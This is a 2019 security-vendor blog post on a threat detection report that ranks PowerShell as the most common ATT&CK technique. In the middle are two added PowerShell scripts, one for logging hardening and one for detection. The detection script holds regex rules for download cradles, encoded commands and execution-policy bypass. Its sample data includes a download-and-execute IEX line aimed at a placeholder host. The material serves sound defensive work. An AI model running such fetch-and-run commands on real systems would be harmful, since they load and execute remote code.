March 20, 2019 Detection and response
Brian Donohue

Getting Started with ATT&CK? New Report Suggests Prioritizing PowerShell

In a newly released report spanning nearly five years and examining some 10,000 confirmed threats, we revealed that PowerShell (T1086) is—by a wide margin—the most prevalent MITRE ATT&CK™ technique that we’ve observed. In fact, PowerShell is so prevalent among our threat detections that we’ve detected it more than twice as often as the next most prevalent ATT&CK technique in our dataset: Scripting (T1064).

Why Is PowerShell So Prevalent?

Like many other techniques highlighted in our report, PowerShell’s prominence is owed largely to its ubiquity and utility. Not only is the tool installed by default on nearly every Windows machine in the world, but systems administrators use it heavily in the normal course of their work. Furthermore, the availability of PowerShell’s source code has spurred the development of cross-platform, offensive tooling that attackers regularly use to deliver payloads in ways that are difficult to detect and prevent. In other words, PowerShell is available, effective, and elusive.

“Beyond the guarantee that it will be present on every Windows endpoint from Vista onward, PowerShell is a rich and elegant language,” explained Casey Smith, Red Canary director of applied research. “Adversaries can use it to harness the full .NET framework and Windows API without having to compile binaries. Furthermore, scripts are performant and easy to deliver. PowerShell fundamentally changed the way that many of us thought about offense and defense because it provided an easy way for adversaries to outpace defensive models that were stuck in thinking that attacks could only come through binaries.”

Luckily, the people that developed and maintain PowerShell are well aware of its notoriety among attackers, and they’ve done a commendable job building security controls around it.

“Microsoft has poured tremendous effort into increasing observability in PowerShell through its logging mechanisms,” Smith continued. “Also, using Constrained Language settings and signed script enforcement, defenders have a whole set of ways to defend against abuse that were simply not present in the early releases of PowerShell—arguably making it one of the most defensible scripting languages in the market.”
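As an added illustration (not code from Red Canary's report or from Microsoft), the script below switches on the observability controls Smith describes (script block logging, module logging and transcription) through the registry keys that sit behind their Group Policy settings, sets the execution policy to AllSigned for signed script enforcement, and reads the resulting state back so a configuration check can assert on it. The transcript directory is a constructed placeholder; Constrained Language Mode is reported but not set here, because it is enforced through an application-control policy (WDAC or AppLocker) rather than a registry toggle.

```powershell
# Added example: enable PowerShell logging controls and report hardening state.
# Run from an elevated session. Registry paths mirror the Group Policy settings
# under "Administrative Templates > Windows Components > Windows PowerShell".

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param(
        # Constructed placeholder; use a directory only administrators can read,
        # since transcripts can capture secrets typed into a session.
        [string]$TranscriptDir = 'C:\PSTranscripts'
    )

    # Script block logging: de-obfuscated script text lands in event 4104
    # of Microsoft-Windows-PowerShell/Operational.
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging: pipeline execution detail for every module (event 4103).
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

    # Transcription: an over-the-shoulder text record of every session.
    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name OutputDirectory -Value $TranscriptDir -Type String
}

function Get-PowerShellHardeningState {
    # Read back what is actually in force rather than trusting what was written.
    $sbl = Get-ItemProperty -Path (Join-Path $PolicyRoot 'ScriptBlockLogging') -ErrorAction SilentlyContinue
    $ml  = Get-ItemProperty -Path (Join-Path $PolicyRoot 'ModuleLogging')      -ErrorAction SilentlyContinue
    $tr  = Get-ItemProperty -Path (Join-Path $PolicyRoot 'Transcription')      -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ScriptBlockLogging = ($sbl.EnableScriptBlockLogging -eq 1)
        ModuleLogging      = ($ml.EnableModuleLogging -eq 1)
        Transcription      = ($tr.EnableTranscripting -eq 1)
        # AllSigned is the signed script enforcement Smith refers to. Execution
        # policy guards against accidental execution; it is not a security boundary.
        ExecutionPolicy    = Get-ExecutionPolicy -Scope LocalMachine
        # ConstrainedLanguage removes direct .NET, COM and Win32 access from the
        # session. It is applied by an application-control policy, so it is only
        # observed here, not configured.
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
    }
}

Enable-PowerShellLogging
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
Get-PowerShellHardeningState | Format-List
```

In an environment managed by Group Policy, set the same values through the PowerShell administrative templates instead, so that policy refresh does not overwrite the local registry writes; the read-back function is still useful there as a drift check.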

What Other Techniques Are Prevalent?

While PowerShell is the most prevalent ATT&CK technique that adversaries are leveraging in the environments we monitor, it is just one of the techniques analyzed in the 2019 Threat Detection Report. Each of the top ten techniques listed in the graphic below has its own dedicated analysis section in the report, containing, among other information, guidance that security teams can use to develop detection strategies.

More than half of the confirmed threats we analyzed for this report fall under just two ATT&CK tactics: execution and defense evasion. The prominence of techniques relating to defense evasion and execution is very much a reflection on the nature of our customer engagements and the closeness with which we monitor endpoint telemetry.

This is an important distinction to point out because the prevalence of certain ATT&CK tactics and techniques will vary depending on how you gather your data. For example, the MITRE ATT&CK team examined hundreds of publicly available threat intelligence reports and compiled their own prevalence rankings for a conference presentation back in January. Their list was distinctly different from ours, including a high number of discovery techniques and a fairly even distribution across other tactics beyond that.

The likely reason is that MITRE analyzed finished threat intelligence reports, which consider entire attack campaigns in retrospect. Our data, on the other hand, is derived from continually monitoring endpoint telemetry in search of potentially malicious behaviors that are then investigated in context to determine malice. Therefore, the data examined for this report emerges almost entirely from behavioral rules that lead to human investigation, and not from the deeper context discovered during the investigation itself. Similarly, if this report were compiled by a company that provides email monitoring services, you’d expect to find a high concentration of techniques that fall under the initial access tactic.

Since Red Canary monitors endpoint telemetry, the insights from our report are going to be most valuable to security teams that are looking to improve endpoint visibility and detection coverage.

How to Get Started with ATT&CK

We get a lot of questions about getting started with ATT&CK, and Red Canary’s 2019 Threat Detection Report is our comprehensive answer to those questions. As Kyle Rainey (one of the authors of this report) pointed out in a presentation at ATT&CKcon late last year, not all ATT&CK techniques are equal. And that’s exactly what this report demonstrates.

As such, if you’re a security team that’s just getting started with MITRE ATT&CK, or you’re trying to increase visibility or expand detection coverage, PowerShell is probably a good place to start. Purely from the detection and response perspective, our data suggests that security teams should prioritize building detection around specific uses of PowerShell, then focus on scripting, and then move sequentially through the rest of the techniques in our prevalence rankings. Furthermore, the tail end of the 2019 Threat Detection Report includes technique prevalence across 15 industry verticals, which should be useful for security teams seeking to improve detection based on threats targeted specifically toward organizations like their own. In essentially every case, these techniques are also particularly useful starting points for deeper investigation.
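To make "building detection around specific uses of PowerShell" concrete, here is an added example (not from the Red Canary report) of a first-pass triage over endpoint telemetry: a handful of regex rules run across PowerShell script block text (event 4104) and process command lines, with any encoded command decoded so an analyst sees what actually ran. The records are constructed for the example, the rule set is deliberately small and meant as a starting point for tuning, and the host name in the sample URL is a placeholder.

```powershell
# Added example: flag PowerShell invocations that routinely warrant a human look.
# Input records carry a CommandText field holding either a process command line
# (from process-creation telemetry) or script block text (from event 4104).

# Each rule is a name and a regex over the logged text. Benign administrative
# use will still trip some of these; tuning against your own baseline is expected.
$Rules = @(
    @{ Name = 'EncodedCommand';   Pattern = '(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'DownloadCradle';   Pattern = '(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)' }
    @{ Name = 'InvokeExpression'; Pattern = '(?i)(Invoke-Expression|\biex\b)' }
    @{ Name = 'HiddenWindow';     Pattern = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'ExecPolicyBypass'; Pattern = '(?i)-ex(ecutionpolicy)?\s+bypass' }
    @{ Name = 'Base64Decode';     Pattern = '(?i)FromBase64String' }
)

function ConvertFrom-EncodedCommand {
    # -EncodedCommand takes base64 of UTF-16LE text; return the decoded script
    # or $null when the record does not carry an encoded command.
    param([string]$Text)
    $m = [regex]::Match($Text, '(?i)-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})')
    if (-not $m.Success) { return $null }
    try {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[3].Value))
    } catch {
        return '<not valid base64>'
    }
}

function Find-SuspiciousPowerShell {
    param([Parameter(Mandatory)][object[]]$Records)
    foreach ($r in $Records) {
        # Collect the names of every rule the record matches.
        $hits = foreach ($rule in $Rules) {
            if ($r.CommandText -match $rule.Pattern) { $rule.Name }
        }
        if ($hits) {
            [pscustomobject]@{
                TimeCreated = $r.TimeCreated
                Host        = $r.MachineName
                Source      = $r.Source
                Rules       = ($hits -join ',')
                Decoded     = ConvertFrom-EncodedCommand $r.CommandText
                Snippet     = $r.CommandText.Substring(0, [Math]::Min(80, $r.CommandText.Length))
            }
        }
    }
}

# Constructed sample records. The encoded payload decodes to "Write-Host hi";
# placeholder.invalid is a non-routable placeholder host name.
$SampleRecords = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2019-03-20T09:00:00'; MachineName = 'WS01'; Source = 'PowerShell/4104'
                       CommandText = 'Get-Service -Name Spooler | Restart-Service' }
    [pscustomobject]@{ TimeCreated = [datetime]'2019-03-20T09:01:00'; MachineName = 'WS01'; Source = 'ProcessCreate'
                       CommandText = 'powershell.exe -nop -w hidden -enc VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA=' }
    [pscustomobject]@{ TimeCreated = [datetime]'2019-03-20T09:02:00'; MachineName = 'WS02'; Source = 'PowerShell/4104'
                       CommandText = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')" }
)

# The first record is ordinary administration and produces no finding; the
# second is reported with its decoded command, the third with two rule names.
Find-SuspiciousPowerShell -Records $SampleRecords | Format-Table -AutoSize
```

On a live host the 4104 records come from Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}, with the script text in the message body; the point of decoding encoded commands at triage time is that the analyst investigates what ran, not a base64 blob, which is exactly the "investigated in context" step the report's data rests on.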

What’s Next?

We’ll be hosting a panel discussion on April 23 in which the report’s authors will be taking questions from the community. If you’re interested, you can register for the webinar below, and we encourage you to submit questions to us ahead of time, either via email or on Twitter.

We generate a massive trove of threat detection data in the normal course of our customer work, and we intend to reexamine that data on a regular basis to see what we can glean from it. While this year’s Threat Detection Report analyzed our entire body of threat data through the prism of MITRE ATT&CK, future iterations might look at how that data changes over time or take an entirely different approach. We welcome any and all input from the broader security community on how we can improve future versions of this report.
